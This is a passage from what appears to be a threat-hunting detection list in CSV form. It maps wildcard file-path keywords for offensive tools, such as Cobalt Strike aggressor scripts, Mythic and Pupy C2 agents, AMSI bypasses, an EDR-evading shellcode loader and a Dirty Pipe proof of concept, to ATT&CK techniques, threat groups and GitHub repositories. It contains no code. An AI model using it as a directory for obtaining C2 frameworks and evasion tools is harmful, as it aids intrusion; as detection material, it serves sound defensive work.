Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*/afp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/afp-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/afp-path-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/afp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/afp-showmount.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/afrog-pocs/*","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/zan8in/afrog","1","1","N/A","N/A","10","2135","272","2023-09-28T09:41:46Z","2022-02-24T06:00:32Z" +"*/agent.ps1.oct*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*/agent/C/src/*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/agent/stagers/dropbox.py*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*/agent_code/Apollo/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/agent_code/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/agent_code/cmd_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/agent_code/dll.go*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/agent_code/merlin.*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/agent_code/powershell_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/agent_code/sh_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/agent_code/zsh_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/agent_functions/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/agent_icons/athena.svg*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AggressiveClean.cna*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/aggressor/*.java*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/aggressor-powerview*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" +"*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" +"*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/agscript *","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/agscript *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*/ahmedkhlief/Ninja/*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/ahrixia/CVE_2022_0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","1","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" +"*/ajp-auth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ajp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ajp-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ajp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ajp-request.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/alan.log*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*/Alan.v*.zip*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*/Alaris.sln*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*/Alcatraz.exe*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/Alcatraz.git*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/Alcatraz/files/*/Alcatraz.zip*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/Alcatraz/x64*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/Alcatraz-gui*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/all/pupyutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/allseeingeye-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/amass/wordlists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/amqp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/amsi.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Amsi_Bypass_In_2023*","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","3","275","48","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" +"*/AMSI_patch.git*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" 